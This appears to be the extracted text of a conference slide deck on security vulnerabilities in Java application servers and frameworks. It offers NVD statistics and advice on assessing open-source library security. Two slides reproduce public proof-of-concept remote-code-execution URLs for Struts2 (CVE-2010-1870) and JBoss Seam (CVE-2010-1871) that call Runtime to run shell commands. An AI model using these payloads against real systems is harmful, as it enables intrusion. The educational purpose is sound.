About Me
• Programmer at heart • Researcher in mind • Speaker with passion • Entrepreneur by need
@yonlabs
Agenda
• Motivation and methodology • Security vulnerabilities
– Stats and examples – App and web servers – Web frameworks
• Approach to security – What to look for – Where to look at
Hello World in cloud is involve 1 load balancer, 3
web server and 2 database server
DevOps_Borat, Twitter
Sources
• The National Vulnerability Database – NIST Computer Security Division – DHS National Cyber Security Division/US CERT – http://nvd.nist.gov/
• The Open Source Vulnerability Database – Open Security Foundation – http://www.osvdb.org/
• The Exploit Database – http://www.exploit-db.com/
Common Vulnerability Scoring System v2
Access Vector Local
Adjecent network
Remote
Access Complexity High
Medium
Low
Authentication Multiple instances
Single instance
None
Confidentiality None
Partial
Complete
Integrity None
Partial
Complete
Availability None
Partial
Complete
Vulnerability Types NVD to CWE Mapping
Authentication Issues
Credentials Management
Permissions, Privileges, and Access Control
Buffer Errors Cross-Site
Request Forgery (CSRF)
Cross-Site Scripting (XSS)
Cryptographic Issues Path Traversal Code Injection Format String
Vulnerability
Configuration Information Leak/Disclosure Input Validation Numeric Errors OS Command
Injections
Race Condition Resource
Management Errors
SQL Injection Link Following
Other Not in CWE Insufficient Information Design Error
App & Web Servers
Tomcat 33%
JBoss 26%
WebLogic 10%
Jetty 8%
GlassFish 8%
WebSphere 7% Other
8%
Survey by ZeroTurnaround
Number of Vulnerabilities OSS and Proprietrary
100
7 20 14 20
185 201
Tomcat Jboss AS Jboss EAP GlassFishJetty WebLogic WebSphere
Based on NVD
Number of Vulnerabilities OSS vs Proprietary
OSS (5 platforms)
29%
Proprietary (2 platforms)
71%
Based on NVD
Vulnerabilities by Year OSS
0
2
4
6
8
10
12
14
16
18
20
2000 01 02 03 04 05 06 07 08 09 10 11 12
TomcatJboss ASJboss EAPGlassFishJetty
Based on NVD
Vulnerabilities by Year OSS + Proprietary
05
101520253035404550
TomcatJboss ASJboss EAPGlassFishJettyWebLogicWebSphere
Based on NVD
Vulnerabilities by Year OSS
0
5
10
15
20
25
30
2000 01 02 03 04 05 06 07 08 09 10 11 12
JettyGlassFishJboss EAPJboss ASTomcat
Based on NVD
Vulnerabilities by Year OSS and Proprietary
0
10
20
30
40
50
60
70
80
90
2000 01 02 03 04 05 06 07 08 09 10 11 12
WebSphereWebLogicJettyGlassFishJboss EAPJboss ASTomcat
Based on NVD
Vulnerabilities Scoring
0 1 4 2
0 20 21
80
2
13 10
17 122 126
10
4
2 1 3
32 28
1 1 10 29
Tomcat Jboss AS Jboss EAP GlassFish Jetty WebLogic WebSphere
LOW [0,4) MEDIUM [4,7) HIGH [7,8] CRITICAL [8,9) WTF?! [9,10]
Based on NVD
Confidentiality Impact
36
0
6 7 8
51 71
62
6
13 6 12
112 99
2 1
0 1 0 22 32
0%10%20%30%40%50%60%70%80%90%
100%
None Partial Complete
Based on NVD
Integrity Impact
55 2
10 5 9 76 71
45
4
9 8
11 91
99
0 1
0 1 0 18 32
0%10%20%30%40%50%60%70%80%90%
100%
None Partial Complete
Based on NVD
Availability Impact
71
2 11
6
14 82 71
28
4
9
5
6
83 99
1 1
0 3
0 20 32
0%10%20%30%40%50%60%70%80%90%
100%
None Partial Complete
Based on NVD
Vulnerability Types by Server
0%20%40%60%80%
100%
Authentication Issues Credentials Management Permissions, Privileges, and Access Control Buffer Errors CSRF XSS Cryptographic Issues Path Traversal Code Injection Configuration Information Leak Input Validation Numeric Errors Race Condition Resource Management Errors SQL Injection Link Following Design Error Unknown
Based on NVD
Top 3 Vulnerabilities
1 9
1
7 7 22
1
11 2
3 5
4 26 3
13 2
6 19 5 1
Tomcat Jboss AS Jboss EAP GlassFish Jetty WebLogic WebSphere
Credentials Management Permissions… CSRF XSSPath Traversal Information LeakInput Validation
Based on NVD
3 and More Vulnerabilities
7 4 9
7 7 22
4 11
3
5 4 26
10 8
3
3 13 6 19 3 5 14
12 8 3
Tomcat Jboss AS Jboss EAP GlassFish Jetty WebLogic WebSphere
Authentication Issues Credentials ManagementPermissions,...l CSRFXSS Cryptographic IssuesPath Traversal ConfigurationInformation Leak Input ValidationResource Management Errors Design Error
Based on NVD
Total Vulnerabilities by Type
0
10
20
30
40
50
60
Cros
s-Si
te S
crip
ting
(XSS
)Pe
rmiss
ions
, Priv
ilege
s,…
Info
rmat
ion
Leak
Inpu
t Val
idat
ion
Reso
urce
Man
agem
ent…
Desig
n Er
ror
Cryp
togr
aphi
c Is
sues
Path
Tra
vers
alAu
then
ticat
ion
Issu
esCr
eden
tials
Man
agem
ent
Cros
s-Si
te R
eque
st…
Conf
igur
atio
nBu
ffer E
rror
sCo
de In
ject
ion
Num
eric
Err
ors
Race
Con
ditio
nLi
nk F
ollo
win
gSQ
L In
ject
ion
WebSphereWebLogicJettyGlassFishJboss EAPJboss ASTomcat
Based on NVD
Max CVSS v2: 10 • CVE-2011-0807 • 20-04-2011 • Unspecified vulnerability in Oracle Sun GlassFish Enterprise Server
2.1, 2.1.1, and 3.0.1, and Sun Java System Application Server 9.1, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Administration.
• AV: Network • AC: Low • Au: None required • C: Complete • I: Complete • A: Complete • Insufficient information
Min CVSS v2: 1.2 • CVE-2010-3718 • 2/10/11 • Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running
within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
• AV: Local access • AC: High • Au: None required • C: None • I: Partial • A: None • Design Error
CVE-2010-1870 exploit (Struts2)
• Found by and exploit shown by Meder Kydyraliev
• Based on his previous bug: XW-641 – ('\u0023' + 'session[\'user\']')(unused)=0wn3d – #session['user']=0wn3d – ActionContext.getContext().getSession().put(“user
”, “0wn3d”) – ParametersInterceptor blacklists # to prevent
tampering with server-side data
CVE-2010-1870: Struts 2 • 8/17/10 • The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0
through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the # protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context variables, a different vulnerability
• AV: Network • AC: Low • Au: None required • C: None • I: Partial • A: None • [Design Error (NVD-CWE-DesignError)]
CVE-2010-1870 exploit • Guards:
– xwork.MethodAccessor.denyMethodExecution – #_memberAccess.allowStaticAccess
• Exploit by Meder Kydyraliev – #_memberAccess[‘allowStaticMethodAccess’] = true – #foo = new java.lang.Boolean(“false”) – #context[‘xwork.MethodAccessor.denyMethodExecution’] = #foo – #rt = @java.lang.Runtime@getRuntime() – #rt.exec(“touch /tmp/dir”, null)
/HelloWorld.action?('\u0023_memberAccess [\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context
[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo') (\u0023foo\u003dnew%20java.lang.Boolean("false")))&(ssss)((\u0023r
t\ ('mkdir\u0020/tmp/PWNED'\u002cnull)))=1
CVE-2010-1871: JBoss Seam • 08/05/2010 • JBoss Seam 2 (jboss-seam2), as used in JBoss
Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.
• 6.8 • (AV:N/AC:M/Au:N/C:P/I:P/A:P) • Input Validation
CVE-2010-1871 exploit
• Found by and exploit provided by Meder Kydyraliev
/seam-booking/home.seam?actionOutcome=/pwn.xht
ml?pwned%3d%23 {expressions.getClass().forName
('java.lang.Runtime').getDeclaredMethods()[19].invoke
(expressions.getClass().forName('java.lang.R untime').getDeclaredMethods()[7].invoke(null),
'mkdir /tmp/ PWNED')}
Culture
The best indicator of the library’s future security is culture that places value on security and clear evidence of broad and rigorous security analysis.
Jeff Williams, CEO, Aspect Security
What to Look For? • Known security vulnerabilities in an OSS library and
trends • Library complexity, its design and its dependencies • Security in software development process of an OSS
library – Security during development
• Security built into the development process – Security during issue handling
• Clear and transparent issue handling • Undisclosed details until fixed • Security response team • Security bulletins • Releases and release notes containing security information
Where to Look At? • Vulnerability Databases
– Open Source Vulnerability Database – National Vulnerability Database – Exploit Database
• Vendor site – Development process – Issue tracker – Security bulletins – Release notes
• Dependency hell – Use support of a dependency management tool (e.g.
update reports in maven)
Top Related